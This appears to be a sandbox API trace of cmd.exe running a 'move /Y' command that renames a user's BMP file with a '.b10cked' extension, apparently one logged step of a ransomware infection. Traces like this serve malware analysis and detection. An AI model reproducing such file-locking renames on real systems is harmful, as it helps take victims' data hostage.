[0231.545] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f864, dwLength=0x1c | out: lpBuffer=0x18f864*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.545] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f864, dwLength=0x1c | out: lpBuffer=0x18f864*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.545] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f864, dwLength=0x1c | out: lpBuffer=0x18f864*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.545] GetConsoleOutputCP () returned 0x1b5 [0231.545] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.545] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.546] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.546] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.546] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.546] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.546] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.546] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.546] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.546] GetEnvironmentStringsW () returned 0x2301b0* [0231.547] FreeEnvironmentStringsW (penv=0x2301b0) returned 1 [0231.547] GetEnvironmentStringsW () returned 0x2301b0* [0231.547] FreeEnvironmentStringsW (penv=0x2301b0) returned 1 [0231.547] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e804 | out: phkResult=0x18e804*=0x40) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0xe8, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x1, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0x1, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x0, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x40, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x40, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0x40, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegCloseKey (hKey=0x40) returned 0x0 [0231.547] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e804 | out: phkResult=0x18e804*=0x40) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0x40, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x1, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0x1, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x0, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x9, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x9, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0x9, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegCloseKey (hKey=0x40) returned 0x0 [0231.547] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.547] srand (_Seed=0x5b8863bf) [0231.547] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked\"" [0231.547] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked\"" [0231.548] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.548] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x231910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.548] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.548] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.548] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.548] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.548] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.548] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.548] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.548] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.548] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.548] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.548] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.548] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.548] GetEnvironmentStringsW () returned 0x232300* [0231.549] FreeEnvironmentStringsW (penv=0x232300) returned 1 [0231.549] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.549] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.549] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.549] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.549] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.549] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.549] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.549] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.549] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.549] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.549] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f5d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.549] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f5d0, lpFilePart=0x18f5cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f5cc*="Desktop") returned 0x18 [0231.549] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.549] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f34c | out: lpFindFileData=0x18f34c) returned 0x230040 [0231.549] FindClose (in: hFindFile=0x230040 | out: hFindFile=0x230040) returned 1 [0231.549] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f34c | out: lpFindFileData=0x18f34c) returned 0x230040 [0231.549] FindClose (in: hFindFile=0x230040 | out: hFindFile=0x230040) returned 1 [0231.550] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f34c | out: lpFindFileData=0x18f34c) returned 0x230040 [0231.550] FindClose (in: hFindFile=0x230040 | out: hFindFile=0x230040) returned 1 [0231.550] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.550] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.550] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.550] GetEnvironmentStringsW () returned 0x232b20* [0231.550] FreeEnvironmentStringsW (penv=0x232b20) returned 1 [0231.550] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.551] GetConsoleOutputCP () returned 0x1b5 [0231.551] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.551] GetUserDefaultLCID () returned 0x409 [0231.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f710, cchData=128 | out: lpLCData="0") returned 2 [0231.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f710, cchData=128 | out: lpLCData="0") returned 2 [0231.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f710, cchData=128 | out: lpLCData="1") returned 2 [0231.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.552] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.553] GetConsoleTitleW (in: lpConsoleTitle=0x220900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.553] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.553] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0231.553] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0231.553] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0231.554] _wcsicmp (_String1="move", _String2=")") returned 68 [0231.554] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0231.554] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0231.554] _wcsicmp (_String1="IF", _String2="move") returned -4 [0231.554] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0231.554] _wcsicmp (_String1="REM", _String2="move") returned 5 [0231.554] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0231.558] GetConsoleTitleW (in: lpConsoleTitle=0x18f408, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.558] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0231.558] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0231.558] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0231.558] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0231.558] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0231.558] _wcsicmp (_String1="move", _String2="CD") returned 10 [0231.558] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0231.558] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0231.558] _wcsicmp (_String1="move", _String2="REN") returned -5 [0231.558] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0231.558] _wcsicmp (_String1="move", _String2="SET") returned -6 [0231.558] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0231.558] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0231.559] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0231.559] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0231.559] _wcsicmp (_String1="move", _String2="MD") returned 11 [0231.559] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0231.559] _wcsicmp (_String1="move", _String2="RD") returned -5 [0231.559] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0231.559] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0231.559] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0231.559] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0231.559] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0231.559] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0231.559] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0231.559] _wcsicmp (_String1="move", _String2="VER") returned -9 [0231.559] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0231.559] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0231.559] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0231.559] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0231.559] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0231.559] _wcsicmp (_String1="move", _String2="START") returned -6 [0231.559] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0231.559] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0231.559] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0231.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.561] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1c4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1bc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f1bc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0231.561] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0231.561] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0231.562] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0231.563] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0231.563] _wcsicmp (_String1="Q--QNZ~1.BMP", _String2=".") returned 67 [0231.563] _wcsicmp (_String1="Q--QNZ~1.BMP", _String2="..") returned 67 [0231.563] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz~1.bmp")) returned 0x20 [0231.563] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x231e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.563] SetErrorMode (uMode=0x0) returned 0x0 [0231.563] SetErrorMode (uMode=0x1) returned 0x0 [0231.563] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", nBufferLength=0x104, lpBuffer=0x18eb4c, lpFilePart=0x18eb34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", lpFilePart=0x18eb34*="Q--QNZ~1.BMP") returned 0x33 [0231.563] SetErrorMode (uMode=0x0) returned 0x1 [0231.563] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00")) returned 0x12 [0231.564] _wcsicmp (_String1="Q--QNZ~1.BMP", _String2=".") returned 67 [0231.564] _wcsicmp (_String1="Q--QNZ~1.BMP", _String2="..") returned 67 [0231.564] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz~1.bmp")) returned 0x20 [0231.564] SetErrorMode (uMode=0x0) returned 0x0 [0231.564] SetErrorMode (uMode=0x1) returned 0x0 [0231.564] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", nBufferLength=0x104, lpBuffer=0x18efc8, lpFilePart=0x18ed60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", lpFilePart=0x18ed60*="Q--QNZ~1.BMP") returned 0x33 [0231.564] SetErrorMode (uMode=0x0) returned 0x1 [0231.564] SetErrorMode (uMode=0x0) returned 0x0 [0231.564] SetErrorMode (uMode=0x1) returned 0x0 [0231.564] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x18f1d0, lpFilePart=0x18ed60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked", lpFilePart=0x18ed60*="Q--qnZ17d.bmp.b10cked") returned 0x3c [0231.564] SetErrorMode (uMode=0x0) returned 0x1 [0231.564] SetLastError (dwErrCode=0x0) [0231.564] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz17d.bmp.b10cked")) returned 0xffffffff [0231.564] GetLastError () returned 0x2 [0231.564] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x18e6dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e6dc) returned 0x220ef0 [0231.565] FindNextFileW (in: hFindFile=0x220ef0, lpFindFileData=0x18e6dc | out: lpFindFileData=0x18e6dc) returned 0 [0231.565] GetLastError () returned 0x12 [0231.565] FindClose (in: hFindFile=0x220ef0 | out: hFindFile=0x220ef0) returned 1 [0231.566] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x231c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x231c30) returned 0x220ef0 [0231.567] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x18e974, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked", lpFilePart=0x0) returned 0x3c [0231.567] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp", nBufferLength=0x104, lpBuffer=0x18e974, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp", lpFilePart=0x0) returned 0x34 [0231.567] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz17d.bmp")) returned 0x20 [0231.567] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz17d.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz17d.bmp.b10cked"), dwFlags=0x3) returned 1 [0231.567] FindClose (in: hFindFile=0x220ef0 | out: hFindFile=0x220ef0) returned 1 [0231.568] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e928 | out: _Buffer=" 1") returned 9 [0231.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.568] GetFileType (hFile=0x7) returned 0x2 [0231.606] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0231.606] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e8b4 | out: lpMode=0x18e8b4) returned 1 [0231.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.607] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e8e8 | out: lpConsoleScreenBufferInfo=0x18e8e8) returned 1 [0231.607] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0231.608] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e928 